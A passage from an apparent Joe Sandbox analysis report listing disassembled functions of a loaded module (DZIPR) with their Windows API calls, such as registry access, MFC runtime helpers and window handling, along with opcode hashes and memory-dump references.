                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FA4A11A
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FA4A13D
                                            • Part of subcall function 6FA4A02D: __EH_prolog3.LIBCMT ref: 6FA4A034
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                                          • String ID: Software\Classes\
                                          • API String ID: 3518408925-1121929649
                                          • Opcode ID: 906ae850801fc769dafb4bbfb49b21e0f64b984a1ad9c89ff08bb293078c1d8f
                                          • Instruction ID: 4beed5c2eedd23fe2bc201ccbe9d4d97392d5ceab5a4b149f4cc898e91429787
                                          • Opcode Fuzzy Hash: 906ae850801fc769dafb4bbfb49b21e0f64b984a1ad9c89ff08bb293078c1d8f
                                          • Instruction Fuzzy Hash: 2F318331C04228AACB21AFA4DD48BDDB7B9AF09324F1402E5E95967290D7385FD4DF51
                                          Function 6FA4D07E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FA4D0AE
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FA4D0D1
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FA4D0ED
                                          • RegCloseKey.ADVAPI32(?), ref: 6FA4D0FD
                                          • RegCloseKey.ADVAPI32(?), ref: 6FA4D107
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CloseCreate$Open
                                          • String ID: software
                                          • API String ID: 1740278721-2010147023
                                          • Opcode ID: 96ec6646a2c120f2d9f5549be496143c6c8c0316c7b656863ddfdd2e0eeffa7b
                                          • Instruction ID: 99f314ab6a7a5cfa863b45de2beefa08227a0ef6e1c36a06603c138df7701e6e
                                          • Opcode Fuzzy Hash: 96ec6646a2c120f2d9f5549be496143c6c8c0316c7b656863ddfdd2e0eeffa7b
                                          • Instruction Fuzzy Hash: 1D112872D00118BB8B21DB8ACD88CDFBFBDEFCA710B1040AAF505A3111D7309A41DBA0
                                          Function 6FA4BEAE Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FA4BEB5
                                          • __CxxThrowException@8.LIBCMT ref: 6FA4BEBF
                                            • Part of subcall function 6FA5527B: RaiseException.KERNEL32(?,00000003,000000FF,6FA4279F), ref: 6FA552BD
                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?), ref: 6FA4BED6
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BEE3
                                            • Part of subcall function 6FA46D89: __CxxThrowException@8.LIBCMT ref: 6FA46D9F
                                          • _memset.LIBCMT ref: 6FA4BF02
                                          • TlsSetValue.KERNEL32(?,00000000,?), ref: 6FA4BF13
                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BF34
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                          • String ID:
                                          • API String ID: 356813703-0
                                          • Opcode ID: 11fdc07856e7add440c3a8c2b9d8a541a7e36f338e94eb2bd04f33e355490376
                                          • Instruction ID: 9b5466fd5e78a7f13250cfb02233077b69006fd3a10bd4b4cc14dbe3571bf98a
                                          • Opcode Fuzzy Hash: 11fdc07856e7add440c3a8c2b9d8a541a7e36f338e94eb2bd04f33e355490376
                                          • Instruction Fuzzy Hash: DC11A174100705AFDB14AF64CC85C2EBBB9FF02324710C529E659966A5CB35ECA0CF50
                                          Function 6FA4CA77 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000000), ref: 6FA4CA85
                                          • SetErrorMode.KERNEL32(00000000), ref: 6FA4CA8D
                                            • Part of subcall function 6FA4A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FA4A6D0
                                            • Part of subcall function 6FA4A698: SetLastError.KERNEL32(0000006F), ref: 6FA4A6E7
                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6FA4CADC
                                          • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FA4CAEC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Error$ModeModule$AddressFileHandleLastNameProc
                                          • String ID: NotifyWinEvent$user32.dll
                                          • API String ID: 1146408833-597752486
                                          • Opcode ID: cd9db1204874483e20ede0c1792b485edc3c2fbcc51288a510912532ad95a089
                                          • Instruction ID: 25c354fddadb270a9eb487dd0bec154277da2a075bfc2d9b44790695f1326d24
                                          • Opcode Fuzzy Hash: cd9db1204874483e20ede0c1792b485edc3c2fbcc51288a510912532ad95a089
                                          • Instruction Fuzzy Hash: F701A2715543149FCB10EF65DA08A5A3BDAFF45720B05806AF959DB281DF39D8C0CF61
                                          Function 6FA4CD20 Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(0000000F), ref: 6FA4CD2E
                                          • GetSysColor.USER32(00000010), ref: 6FA4CD35
                                          • GetSysColor.USER32(00000014), ref: 6FA4CD3C
                                          • GetSysColor.USER32(00000012), ref: 6FA4CD43
                                          • GetSysColor.USER32(00000006), ref: 6FA4CD4A
                                          • GetSysColorBrush.USER32(0000000F), ref: 6FA4CD57
                                          • GetSysColorBrush.USER32(00000006), ref: 6FA4CD5E
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Color$Brush
                                          • String ID:
                                          • API String ID: 2798902688-0
                                          • Opcode ID: 1f67c6b3804af1521d0a4a40b33ca9f23395fcbeaf1072ef7275a2706b1553d1
                                          • Instruction ID: 83eb6de420ef69644005e0c5c1b184dad74c66415d6100ba004236f94bc9399c
                                          • Opcode Fuzzy Hash: 1f67c6b3804af1521d0a4a40b33ca9f23395fcbeaf1072ef7275a2706b1553d1
                                          • Instruction Fuzzy Hash: 79F012719407445BDB30BF724D09B47BAD5FFC5720F16092EE2458B990D6B6E441DF40
                                          Function 6FA4815A Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000F0), ref: 6FA4818D
                                          • GetParent.USER32(?), ref: 6FA4819B
                                          • GetParent.USER32(?), ref: 6FA481AE
                                          • GetLastActivePopup.USER32(?), ref: 6FA481BF
                                          • IsWindowEnabled.USER32(?), ref: 6FA481D3
                                          • EnableWindow.USER32(?,00000000), ref: 6FA481E6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                          • String ID:
                                          • API String ID: 670545878-0
                                          • Opcode ID: 51a2d6927cc2b26eb4af9b7945c6fb6a206395d94e209aef0a47f4d71157791a
                                          • Instruction ID: 7dbe077d3eeecfba28670f8077b367f7c33b6ba085e480739dd10694ba5c8afe
                                          • Opcode Fuzzy Hash: 51a2d6927cc2b26eb4af9b7945c6fb6a206395d94e209aef0a47f4d71157791a
                                          • Instruction Fuzzy Hash: 6411CA72A0DB21ABD751066DAD80B6A77ACAF46B60F0D4117ED14EB240D768E8C1CED1
                                          Function 6FA5C416 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 6FA5C43E
                                            • Part of subcall function 6FA54FC4: __getptd.LIBCMT ref: 6FA54FD2
                                            • Part of subcall function 6FA54FC4: __getptd.LIBCMT ref: 6FA54FE0
                                          • __getptd.LIBCMT ref: 6FA5C448
                                            • Part of subcall function 6FA5A27F: __getptd_noexit.LIBCMT ref: 6FA5A282
                                            • Part of subcall function 6FA5A27F: __amsg_exit.LIBCMT ref: 6FA5A28F
                                          • __getptd.LIBCMT ref: 6FA5C456
                                          • __getptd.LIBCMT ref: 6FA5C464
                                          • __getptd.LIBCMT ref: 6FA5C46F
                                          • _CallCatchBlock2.LIBCMT ref: 6FA5C495
                                            • Part of subcall function 6FA55069: __CallSettingFrame@12.LIBCMT ref: 6FA550B5
                                            • Part of subcall function 6FA5C53C: __getptd.LIBCMT ref: 6FA5C54B
                                            • Part of subcall function 6FA5C53C: __getptd.LIBCMT ref: 6FA5C559
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 1602911419-0
                                          • Opcode ID: 896889c8d1a6645f09cfd9b205a8b67e80d321f8f9654fae5832f5f859902b54
                                          • Instruction ID: c05937f8d559195de2d037706fc7b429de8300820d39dd643457f6f2b0aa4580
                                          • Opcode Fuzzy Hash: 896889c8d1a6645f09cfd9b205a8b67e80d321f8f9654fae5832f5f859902b54
                                          • Instruction Fuzzy Hash: 471119B1D04309DFDF00DFA4C945A9D7BB1FF14318F108169E814AB2A0DB399AA5DF60
                                          Function 6FA4DB5C Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 6FA4DB6D
                                          • GetDlgCtrlID.USER32(00000000), ref: 6FA4DB81
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FA4DB91
                                          • GetWindowRect.USER32(00000000,?), ref: 6FA4DBA3
                                          • PtInRect.USER32(?,?,?), ref: 6FA4DBB3
                                          • GetWindow.USER32(?,00000005), ref: 6FA4DBC0
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                          • String ID:
                                          • API String ID: 1315500227-0
                                          • Opcode ID: 18c118756edeb7d3b4514df5483af6ef1ca50abe00efeed254882941c759c90f
                                          • Instruction ID: c32abe548f8f2232b0b071879dc00530ee0eb24e36faf4baa4be51081523474b
                                          • Opcode Fuzzy Hash: 18c118756edeb7d3b4514df5483af6ef1ca50abe00efeed254882941c759c90f
                                          • Instruction Fuzzy Hash: 1E014B32104A29ABDB115B64CC08EAE3B6EEF47B61F088125F911A6490D738E567CA94
                                          Function 6FA52932 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: _memset
                                          • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                          • API String ID: 2102423945-1093365818
                                          • Opcode ID: d3b27f9f75bd85e1afa45db972146ed0b4381563efcc6b60ad3d5e18b8b30bd1
                                          • Instruction ID: 2069de8ae5a8ce8204e6fb2d2e6fb4f18cc8145da071ce7866463780be760632
                                          • Opcode Fuzzy Hash: d3b27f9f75bd85e1afa45db972146ed0b4381563efcc6b60ad3d5e18b8b30bd1
                                          • Instruction Fuzzy Hash: DD91F071D0030DAEEB41CFE4C585BDEBBF8AF48348F159166F918E6181E7789694C7A0
                                          Function 6FA496DA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMenuCheckMarkDimensions.USER32 ref: 6FA496F2
                                          • _memset.LIBCMT ref: 6FA4976A
                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FA497CD
                                          • LoadBitmapW.USER32(00000000,00007FE3), ref: 6FA497E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                          • String ID:
                                          • API String ID: 4271682439-3916222277
                                          • Opcode ID: 1e378432364b3b5cbcdb6962a345ef0a7ee09ddc6ec1198f43178602e0336886
                                          • Instruction ID: 3b24fe902fe849c470e0a1b9b2b853ae0ea7a54708f22ef17c02b4d5810f2ad4
                                          • Opcode Fuzzy Hash: 1e378432364b3b5cbcdb6962a345ef0a7ee09ddc6ec1198f43178602e0336886
                                          • Instruction Fuzzy Hash: EB314771A003249FEF108F288EC5BA97BB9FF49350F5980B6E549DB2C1DB3499958F50
                                          Function 6FA5C165 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • __getptd.LIBCMT ref: 6FA5C17F
                                            • Part of subcall function 6FA5A27F: __getptd_noexit.LIBCMT ref: 6FA5A282
                                            • Part of subcall function 6FA5A27F: __amsg_exit.LIBCMT ref: 6FA5A28F
                                          • __getptd.LIBCMT ref: 6FA5C190
                                          • __getptd.LIBCMT ref: 6FA5C19E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: MOC$csm
                                          • API String ID: 803148776-1389381023
                                          • Opcode ID: 8c112de8ba61407736256011eba1e9c09d59243f4efd8b177e32e0b804c32463
                                          • Instruction ID: fb46bf4a35229456c803c2b27eb9cf37ef6fde99b8e67f488eb414b12e1706b9
                                          • Opcode Fuzzy Hash: 8c112de8ba61407736256011eba1e9c09d59243f4efd8b177e32e0b804c32463
                                          • Instruction Fuzzy Hash: 38E04F756182048FDB009BB4C546B5C37A5FF69718F1901A1D40CCB265D73DE5E1DA92
                                          Function 6FA45670 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,?,6FA449D6,?,00000003), ref: 6FA45685
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FA456B4
                                          • GetLastError.KERNEL32 ref: 6FA456C5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FA456E5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FA45709
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                          • String ID:
                                          • API String ID: 3322701435-0
                                          • Opcode ID: 793a132cefbe1e466cea23b46ac284846c90d8f9da509171f3124a4568edbedf
                                          • Instruction ID: 7726e538a74e8de84f67166df85750bc173497d2fa46e09bfa3f3a5eda8a7b06
                                          • Opcode Fuzzy Hash: 793a132cefbe1e466cea23b46ac284846c90d8f9da509171f3124a4568edbedf
                                          • Instruction Fuzzy Hash: 1C11B175384305AFE6209F68CCC0F2777ACEF85B18F100D28F641972C0D664BC498675
                                          Function 6FA4DA11 Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?), ref: 6FA4DA3D
                                          • _memset.LIBCMT ref: 6FA4DA5B
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 6FA4DA75
                                          • lstrcmpW.KERNEL32(?,?,?,?), ref: 6FA4DA87
                                          • SetWindowTextW.USER32(00000000,?), ref: 6FA4DA93
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                          • String ID:
                                          • API String ID: 4273134663-0
                                          • Opcode ID: 59b1cad4f5f351a7701125568f496e22f27c8ec804ea0f8adb7d7d59e9b396e5
                                          • Instruction ID: 800fdb33262694a1fc3df9c7031e4d61d5de619480dc7e805085d77ce5ec266a
                                          • Opcode Fuzzy Hash: 59b1cad4f5f351a7701125568f496e22f27c8ec804ea0f8adb7d7d59e9b396e5
                                          • Instruction Fuzzy Hash: 9001C4BA504719A7CB00DB748D88DAF73AEEF46314F048461EA15D3241DA38D958C7B0
                                          Function 6FA5FE0E Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __getptd.LIBCMT ref: 6FA5FE1A
                                            • Part of subcall function 6FA5A27F: __getptd_noexit.LIBCMT ref: 6FA5A282
                                            • Part of subcall function 6FA5A27F: __amsg_exit.LIBCMT ref: 6FA5A28F
                                          • __amsg_exit.LIBCMT ref: 6FA5FE3A
                                          • __lock.LIBCMT ref: 6FA5FE4A
                                          • InterlockedDecrement.KERNEL32(?), ref: 6FA5FE67
                                          • InterlockedIncrement.KERNEL32(02B628C0), ref: 6FA5FE92
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                          • String ID:
                                          • API String ID: 4271482742-0
                                          • Opcode ID: a36cf88646e90a4b3a112d49804a451ebc0c3fec5d138ce580ad9f32061c112d
                                          • Instruction ID: c8b65ceed8b306841c8f9f87b47851a86c66067cc130c33e82bddc0a5bde4020
                                          • Opcode Fuzzy Hash: a36cf88646e90a4b3a112d49804a451ebc0c3fec5d138ce580ad9f32061c112d
                                          • Instruction Fuzzy Hash: D6015E36A01B319BDB119F658908B5E77E1AF45724F05410DDC1067291CB3CB9F2CBD5
                                          Function 6FA4C113 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • TlsFree.KERNEL32(?,?,?,6FA4C179), ref: 6FA4C13B
                                          • GlobalHandle.KERNEL32(?), ref: 6FA4C149
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6FA4C152
                                          • GlobalFree.KERNEL32(00000000), ref: 6FA4C159
                                          • DeleteCriticalSection.KERNEL32(?,?,?,6FA4C179), ref: 6FA4C163
                                            • Part of subcall function 6FA4BF5D: EnterCriticalSection.KERNEL32(?), ref: 6FA4BFBC
                                            • Part of subcall function 6FA4BF5D: LeaveCriticalSection.KERNEL32(?), ref: 6FA4BFCC
                                            • Part of subcall function 6FA4BF5D: LocalFree.KERNEL32(?), ref: 6FA4BFD5
                                            • Part of subcall function 6FA4BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FA4BFE7
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
